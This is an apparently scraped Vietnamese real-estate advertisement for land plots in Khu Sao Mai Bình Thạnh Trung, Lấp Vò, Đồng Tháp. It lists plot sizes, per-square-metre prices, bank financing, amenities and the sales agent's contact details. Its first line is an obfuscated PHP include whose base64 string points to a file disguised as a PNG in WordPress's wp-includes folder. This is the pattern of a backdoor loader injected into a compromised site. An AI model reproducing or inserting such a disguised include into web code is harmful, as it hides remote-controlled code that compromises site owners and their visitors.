@include base64_decode("L2hvbWUvdGhhaW5nb2MvcHVibGljX2h0bWwvd3AtaW5jbHVkZXMvaW1hZ2VzL3dwaWNvbnMtM3gucG5n"); 𝗞𝗛𝗨 𝗦𝗔𝗢 𝗠𝗔𝗜 𝗕𝗜̀𝗡𝗛 𝗧𝗛𝗔̣𝗡𝗛 𝗧𝗥𝗨𝗡𝗚 - Thaingocland

𝗞𝗛𝗨 𝗦𝗔𝗢 𝗠𝗔𝗜 𝗕𝗜̀𝗡𝗛 𝗧𝗛𝗔̣𝗡𝗛 𝗧𝗥𝗨𝗡𝗚

 

 

 

🌠 𝗞𝗛𝗨 𝗦𝗔𝗢 𝗠𝗔𝗜 𝗕𝗜̀𝗡𝗛 𝗧𝗛𝗔̣𝗡𝗛 𝗧𝗥𝗨𝗡𝗚
📌 𝗕𝗶̀𝗻𝗵 𝗧𝗵𝗮̣𝗻𝗵 𝗧𝗿𝘂𝗻𝗴, 𝗟𝗮̂́𝗽 𝗩𝗼̀, Đ𝗼̂̀𝗻𝗴 𝗧𝗵𝗮́𝗽.

👉🏻 𝘾𝙤̛ 𝙝𝙤̣̂𝙞 𝙨𝙤̛̉ 𝙝𝙪̛̃𝙪 𝙣𝙚̂̀𝙣 đ𝙚̣𝙥 – 𝙜𝙞𝙖́ đ𝙖̂̀𝙪 𝙩𝙪̛ 𝙧𝙚̉ – 𝙨𝙞𝙣𝙝 𝙡𝙤̛̀𝙞 𝙘𝙖𝙤 𝙩𝙧𝙤𝙣𝙜 𝙩𝙪̛𝙤̛𝙣𝙜 𝙡𝙖𝙞 𝙣𝙝𝙤̛̀ đ𝙞̣𝙖 𝙩𝙝𝙚̂́ 𝙩𝙤̂́𝙩.

📐 𝐃𝐢𝐞̣̂𝐧 𝐭𝐢́𝐜𝐡: 5𝘮 𝘹 18.25𝘮 (91.5 𝘮2), 5𝘮 𝘹 20𝘮 (100 𝘮2), 5𝘮 𝘹 21𝘮 (105 𝘮2), …

💳 𝐆𝐢𝐚́ 𝐛𝐚́𝐧: 𝐭𝐮̛̀ 𝟏𝟏 𝐭𝐫𝐢𝐞̣̂𝐮/𝐦𝟐 đ𝐞̂́𝐧 𝟏𝟑.𝟗 𝐭𝐫𝐢𝐞̣̂𝐮/𝐦𝟐
🏦 Đ𝙪̛𝙤̛̣𝙘 𝙡𝙞𝙚̂𝙣 𝙠𝙚̂́𝙩 𝙣𝙜𝙖̂𝙣 𝙝𝙖̀𝙣𝙜 𝙫𝙖𝙮 70% 𝙠𝙝𝙞 𝙢𝙪𝙖 𝙣𝙚̂̀𝙣.

🎡 𝐓𝐢𝐞̣̂𝐧 𝐢́𝐜𝐡 𝐧𝐨̣̂𝐢 𝐤𝐡𝐮:
– 𝑁𝑔𝑎𝑦 𝑡𝑟𝑢𝑛𝑔 𝑡𝑎̂𝑚 𝑦 𝑡𝑒̂́ ℎ𝑢𝑦𝑒̣̂𝑛 𝐿𝑎̂́𝑝 𝑉𝑜̀.
– 𝐺𝑎̂̀𝑛 𝑐ℎ𝑜̛̣ 𝐿𝑎̂́𝑝 𝑉𝑜̀, 𝑡𝑟𝑢̛𝑜̛̀𝑛𝑔 ℎ𝑜̣𝑐, 𝑡𝑟𝑢𝑛𝑔 𝑡𝑎̂𝑚 𝑑𝑎̣𝑦 𝑛𝑔ℎ𝑒̂̀, 𝑘ℎ𝑢 𝑣𝑢𝑖 𝑐ℎ𝑜̛𝑖 𝑡𝑟𝑒̉ 𝑒𝑚.
– 𝐻𝑒̣̂ 𝑡ℎ𝑜̂́𝑛𝑔 𝑡ℎ𝑜𝑎́𝑡 𝑛𝑢̛𝑜̛́𝑐 𝑏𝑎̆̀𝑛𝑔 𝑐𝑜̂́𝑛𝑔 𝑏𝑒̂ 𝑡𝑜̂𝑛𝑔 𝑐𝑜̂́𝑡 𝑡ℎ𝑒́𝑝 𝑣𝑖̃𝑛ℎ 𝑐𝑢̛̉𝑢, đ𝑎̉𝑚 𝑏𝑎̉𝑜 𝑘ℎ𝑜̂𝑛𝑔 𝑏𝑖̣ 𝑛𝑔𝑎̣̂𝑝 𝑛𝑢̛𝑜̛́𝑐 𝑘ℎ𝑖 𝑚𝑢̛𝑎 𝑙𝑜̛́𝑛 ℎ𝑎𝑦 𝑙𝑢̃ 𝑣𝑒̂̀.
– 𝐻𝑒̣̂ 𝑡ℎ𝑜̂́𝑛𝑔 𝑐𝑎̂́𝑝 đ𝑖𝑒̣̂𝑛, 𝑛𝑢̛𝑜̛́𝑐 𝑣𝑎̀ 𝑖𝑛𝑡𝑒𝑟𝑛𝑒𝑡 đ𝑎̂̀𝑦 đ𝑢̉.
– 𝐻𝑎̣ 𝑡𝑎̂̀𝑛𝑔 𝑘𝑦̃ 𝑡ℎ𝑢𝑎̣̂𝑡 đ𝑢̛𝑜̛̣𝑐 𝑥𝑎̂𝑦 𝑑𝑢̛̣𝑛𝑔 𝑘𝑖𝑒̂𝑛 𝑐𝑜̂́ đ𝑎̣𝑡 𝑡𝑖𝑒̂𝑢 𝑐ℎ𝑢𝑎̂̉𝑛 𝑐𝑎𝑜.
– 𝑀𝑜̂𝑖 𝑡𝑟𝑢̛𝑜̛̀𝑛𝑔 𝑠𝑜̂́𝑛𝑔 𝑣𝑎̆𝑛 𝑚𝑖𝑛ℎ – ℎ𝑖𝑒̣̂𝑛 đ𝑎̣𝑖, 𝑥𝑎𝑛ℎ – 𝑠𝑎̣𝑐ℎ – đ𝑒̣𝑝.

📕 𝗦𝗼̂̉ đ𝗼̉ 𝘀𝗮𝗻𝗴 𝘁𝗲̂𝗻 𝗻𝗵𝗮𝗻𝗵 𝗰𝗵𝗼́𝗻𝗴

👉🏻 𝑳𝒊𝒆̂𝒏 𝒉𝒆̣̂ 𝒕𝒉𝒐̂𝒏𝒈 𝒕𝒊𝒏 𝒃𝒆̂𝒏 𝒅𝒖̛𝒐̛́𝒊 đ𝒆̂̉ đ𝒖̛𝒐̛̣𝒄 𝒕𝒖̛ 𝒗𝒂̂́𝒏 𝒄𝒖̣ 𝒕𝒉𝒆̂̉ 𝒗𝒆̂̀ 𝒄𝒉𝒊́𝒏𝒉 𝒔𝒂́𝒄𝒉 𝒕𝒉𝒂𝒏𝒉 𝒕𝒐𝒂́𝒏 𝒗𝒂̀ 𝒖̛𝒖 đ𝒂̃𝒊:
——————————//———————————
𝐏𝐡𝐨̀𝐧𝐠 𝐊𝐢𝐧𝐡 𝐝𝐨𝐚𝐧𝐡 𝐁Đ𝐒 𝐒𝐚𝐨 𝐌𝐚𝐢 𝐆𝐫𝐨𝐮𝐩
📲 𝟬𝟵𝟰𝟵 𝟭𝟳𝟱 𝟯𝟭𝟳 ( 𝐂𝐡𝐢𝐦 𝐓𝐡𝐚́𝐢 𝐍𝐠𝐨̣𝐜 – 𝐏𝐡𝐨́ 𝐆Đ )

 

 

Tag: #nhadatangiang, #nhadatdongthap, #khusaomailapvo, #khusaomaibinhthanhtrung, #nhadatbinhthanhtrunglapvo

LIÊN HỆ THÁI NGỌC LAND

Quý khách hàng vui lòng liên hệ trực tiếp Thái Ngọc Land - An Giang theo: HOTLINE TƯ VẤN 24/7: 0949.175.317 (Chim Thái Ngọc) hoặc Liên hệ qua Email: chimthaingoc@gmail.com, chúng tôi sẽ phản hồi trong thời gian sớm nhất. Chân thành cảm ơn quý khách hàng đã quan tâm đến các dự án bất động sản của chúng tôi đang đầu tư, cũng như các dự án đất nền mà chúng tôi đang nhận phát triển phân phối cho các đối tác chuyên nghiệp.

Trả lời

Email của bạn sẽ không được hiển thị công khai.